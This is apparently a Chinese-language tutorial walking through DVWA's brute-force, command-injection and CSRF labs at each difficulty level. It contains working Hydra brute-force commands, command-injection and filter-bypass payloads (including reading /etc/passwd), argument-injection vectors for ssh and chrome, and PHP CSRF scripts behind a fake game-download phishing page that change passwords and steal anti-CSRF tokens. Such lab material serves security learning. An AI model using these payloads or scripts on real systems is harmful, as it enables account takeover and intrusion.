dvwa:暴力破解、命令注入、csrf全难度详解

暴力破解

复制代码
easy模式
hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
添加登陆路径、用户名占位符、密码占位符、添加请求头、错误返回的字符串
http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login#:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
登陆路径:/dvwa/vulnerabilities/brute/
用户名和密码占位符:username=^USER^&password=^PASS^&Login=Login#
添加请求头:H=Cookie\: security=low; PHPSESSID=481b089a941d0aecc848227e2e90202e(注意冒号转位)
添加错误返回的字符串:Username and/or password incorrect.
​
[80][http-get-form] host: 192.168.72.1   login: admin   password: password
​
复制代码
medium一样能爆破出,但会睡眠2秒

high模式加了一个token,但是加了token跟不加token都能爆破出来
​
hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login&user_token=564d1b908f7b4a9e975d00bc707fab3e:H=Cookie\: security=high; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=high; PHPSESSID=481b089a941d0aecc848227e2e90202e:Username and/or password incorrect."
​
hydra -L usernames.txt -P password.txt 192.168.72.1 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: security=high;:Username and/or password incorrect."
复制代码
impossible代码逻辑:
如果登录失败,更新数据库使得用户登录失败次数+1,如果登录失败次数超过3次,account_locked将为false,下次登陆时必须等待 15分钟才会将account_locked设置为true
但是就算等待了15分钟,代码并没有将登陆失败次数清零,所以一旦登陆失败一次,就直接锁住
​
注:impossible是post,其他难度都是get

命令注入

外部命令注入:

  • ;(分号):允许您按顺序执行多个命令。

  • &&(AND):仅当第一个命令成功(返回零退出状态)时才执行第二个命令。

  • ||(或):仅当第一个命令失败(返回非零退出状态)时才执行第二个命令。

  • &(后台):在后台执行命令,允许用户继续使用shell。

  • |(管道):获取第一个命令的输出并将其用作第二个命令的输入。

  • < (重定向) :将后者输出重定向前者输入

    这种方法甚至不需要<前面是个正常的linux命令、即使报错也会输出<后面的执行结果

复制代码
payload:
127.0.0.1 & whoami
适用于linux(这种方法甚至不需要<前面是个正常的linux命令、即使报错也会输出<后面的执行结果):
127.0.0.1 < "`whoami`"
127.0.0.1 < "$(whoami)"
复制代码
medium
        '&&' => '',
        ';' => ''
        
payload:
127.0.0.1 & whoami
127.0.0.1 | whoami
127.0.0.1 &;& whoami
适用于linux:
127.0.0.1 < "`whoami`"
127.0.0.1 < "$(whoami)"
复制代码
high
        '&'  => '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
"| "成为了黑名单,但是"|"去掉空格还能使用
​
payload:
127.0.0.1 |whoami
复制代码
impossible
通过.将ip分开,判断分离的数量是否为4,且判断这4部分是否都是数字,这两个条件成立,才会执行ping命令
命令注入其他扩展
参数注入

当您只能将参数附加到现有命令时,即可获得命令执行权。

查询参数注入的网站:Argument Injection Vectors

  • chrome

    复制代码
    chrome '--gpu-launcher="id>/tmp/foo"'
  • SSH

    复制代码
    ssh '-oProxyCommand="touch /tmp/foo"' foo@foo
  • 查询语言

    复制代码
    psql -o'|id>/tmp/foo'
字符串内部命令注入
  • 反引号

  • $()

  • 复制代码

    payload1:
    echo "`ip a`" echo "$(ip a)" payload2: 其他命令< "`whoami`"

空格替换
复制代码
${IFS}替换
cat${IFS}flag.txt
​
重定向符号替换
cat</etc/passwd
127.0.0.1<"$(whoami)"

csrf

基本思路:构造一个html钓鱼网页,钓鱼网页上有访问dvwa网站修改密码的链接,但是我发现一个问题,就是如果钓鱼网页上直接就是:http://192.168.72.1/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#的话,我们只能操控get请求的数据,不能操控header的数据和post提交的数据,而且最大的问题在于被攻击的人点击这个链接,请求头里有:H=Cookie\: security=impossible; PHPSESSID=481b089a941d0aecc848227e2e90202e,也就是说默认就是困难难度而且网页get请求不能操控header修改不了难度,所以需要使用vps写一个php服务构造恶意请求并发送

easy

前端钓鱼代码

html 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>下载游戏</h3>
    <a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
</body>
</html>
复制代码

php伪造请求(csrf.php)

php 复制代码
<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
​
// 设置响应头,告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
​
// 输出 HTML 内容
echo $htmlContent;
​
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/'; // 要发送请求的 URL
​
// GET 数据
$get_data = array(
    'password_new' => '6666',
    'password_conf' => '6666',
    'Change' => 'Change'
);
​
// 自定义请求头
$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=easy',
);
​
// 初始化 cURL
$ch = curl_init();
​
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求
$response = curl_exec($ch);
​
// 检查是否有错误发生
if($response === false) {
    echo 'cURL error: ' . curl_error($ch);
} else {
    // 打印响应
    echo $response;
}
​
// 关闭 cURL 资源
curl_close($ch);
?>

点击后:

同时修改密码成功

medium

需要简单配置:

  • phpstudy给网站个域名,如下图

  • linux攻击机器添加host头

复制代码
vim /etc/hosts
192.168.72.1    www.oswe.com

为什么需要以上配置:

复制代码
因为后端代码的判断
变量$_SERVER[ 'HTTP_REFERER' ]是否有$_SERVER[ 'SERVER_NAME' ],如果有,则说明当前修改密码的请求是从本网站跳转过来的,而不是从钓鱼网站跳转过来的,
而$_SERVER[ 'SERVER_NAME' ]这个变量实际上就是你的域名,为了能使我们的linux能解析到域名所以添加hosts头

源码的判断:

复制代码
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ){
    # 正常
}
else{
    # 错误
}
​
其中
$_SERVER[ 'HTTP_REFERER' ] = 请求头里的referer  
$_SERVER[ 'SERVER_NAME' ] = 域名www.oswe.com
​
如果请求头的referer中存在域名www.oswe.com,执行正常功能

篡改请求头referer

复制代码
$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=medium',
    'Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);

前端钓鱼代码

html 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>下载游戏</h3>
    <a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
</body>
</html>

后端php伪造恶意请求代码(csrf.php)

php 复制代码
<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
​
// 设置响应头,告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
​
// 输出 HTML 内容
echo $htmlContent;
​
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/'; // 要发送请求的 URL
​
// GET 数据
$get_data = array(
    'password_new' => '6666',
    'password_conf' => '6666',
    'Change' => 'Change'
);
​
// 自定义请求头
$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=medium',
    'Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);
​
// 初始化 cURL
$ch = curl_init();
​
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求
$response = curl_exec($ch);
​
// 检查是否有错误发生
if($response === false) {
    echo 'cURL error: ' . curl_error($ch);
} else {
    // 打印响应
    echo $response;
}
​
// 关闭 cURL 资源
curl_close($ch);
?>
hard
复制代码
array_key_exists 函数
— 检查数组里是否有指定的键名或索引
数组里有键 key 时,array_key_exists() 返回 true。 key 可以是任何能作为数组索引的值。
主要检查提交的数据是否完整:
if (array_key_exists("user_token", $_REQUEST) &&
        array_key_exists("password_new", $_REQUEST) &&
        array_key_exists("password_conf", $_REQUEST) &&
        array_key_exists("Change", $_REQUEST))
​
checkToken 函数
检测请求包的token和用户的会话token是否一致:
if ($_SESSION[ 'session_token' ] === $_REQUEST["user_token"])
关于token
复制代码
这里的token是一开始请求固定在html页面的表单里的,每一次的请求都会更新一次token的值,我们需要先劫持token然后再伪造请求,固定在表单里的token如下:
​
<form action="#" method="GET">
            New password:<br />
            <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
            Confirm new password:<br />
            <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
            <br />
            <input type="submit" value="Change" name="Change">
            <input type='hidden' name='user_token' value='8a5cd4cae342ac86000a7abb1d65a5fa' />
</form>

思路:

  • 构造恶意链接,链接向dvwa的high模式下的csrf页面请求两次

    • 第一次请求是为了获取到固定在表单里的token

    • 第二次请求是为了使用这个token来修改密码

前端钓鱼代码

html 复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <h3>下载游戏</h3>
    <a href="http://192.168.72.1/dvwa/csrf.php">赛博朋克2077</a>
    <a href="http://192.168.72.1/dvwa/csrf_token.php">巫师3</a>
</body>
</html>
复制代码
​
其中csrf.php是之前的没有token模式的恶意php请求
csrf_token.php是我们请求两次的恶意php请求

php恶意请求代码csrf_token.php

php 复制代码
<?php
// 设置要返回的 HTML 内容
$htmlContent = '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Custom Page</title>
</head>
<body>
<h1>赛博朋克下载</h1>
<p>赛博朋克下载成功</p>
</body>
</html>
';
// 初始化 cURL
$ch = curl_init();
​
$url = 'http://192.168.72.1/dvwa/vulnerabilities/csrf/';
​
$headers = array(
    'Cookie: PHPSESSID=a0u9pif21dqn9hq1115geuujnk; security=high',
    'Referer: http://www.oswe.com/dvwa/vulnerabilities/csrf/'
);
​
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求并将结果保存到 $html 变量中
$html = curl_exec($ch);
​
​
// 创建一个 DOMDocument 对象并载入 HTML 内容
$dom = new DOMDocument();
@$dom->loadHTML($html);
​
// 获取所有的 input 标签
$inputElements = $dom->getElementsByTagName('input');
​
$userTokenValue = null;
​
// 遍历所有的 input 标签,查找 name 为 user_token 的元素
foreach ($inputElements as $element) {
    if ($element->getAttribute('name') === 'user_token') {
        // 输出 user_token 的值
        $userTokenValue = $element->getAttribute('value');
        break; // 找到后跳出循环
    }
}
if ($userTokenValue) {
    echo "使用了如下token修改密码:". $userTokenValue;
} else {
    echo "user_token not found";
}
​
​
// 设置响应头,告诉浏览器返回的内容是 HTML
header('Content-Type: text/html');
​
// 输出 HTML 内容
echo $htmlContent;
​
// GET 数据
$get_data = array(
    'password_new' => '8888',
    'password_conf' => '8888',
    'Change' => 'Change',
    'user_token' => $userTokenValue
);
​
​
// 设置 URL 和其他 cURL 选项
curl_setopt($ch, CURLOPT_URL, $url . '?' . http_build_query($get_data)); // 将 GET 数据添加到 URL
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); // 设置自定义请求头
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
​
// 执行 cURL 请求
$response = curl_exec($ch);
​
// 检查是否有错误发生
// if($response === false) {
//     echo 'cURL error: ' . curl_error($ch);
// } else {
//     // 打印响应
//     echo $response;
// }
​
// 关闭 cURL 资源
curl_close($ch);
?>

这里点的是巫师3,但显示下载成功的是赛博朋克,是因为这个返回页面我懒得该,直接返回的字符串

impossible

修改密码前,输入当前密码来身份验证,导致csrf请求伪造无法获取用户凭据

相关推荐
maimang092 小时前
关于UDP缓冲区和丢包统计
网络
tjjingpan3 小时前
HCIA-Access V2.5_4_2_静态路由介绍
网络
follycat3 小时前
bestphp‘s revenge
学习·web安全
CESS_Cloud3 小时前
CESS 出席华盛顿区块链政策峰会:参与国家安全与数据隐私保护专题讨论
安全·阿里云·web3·去中心化·区块链
黑客K-ing3 小时前
网络安全防范
linux·服务器·web安全
这题怎么做?!?4 小时前
ARP协议及其具体过程
运维·服务器·网络
无线认证x英利检测4 小时前
进网许可认证、交换路由设备检测项目更新25年1月起
网络·智能路由器
卡卡大怪兽4 小时前
fastAPI接口的请求与响应——基础
服务器·网络·fastapi
昌sit!4 小时前
监控IP频繁登录服务器脚本
服务器·网络·tcp/ip
阿Q说代码5 小时前
合合信息:视觉内容安全技术的前沿进展与应用
后端·安全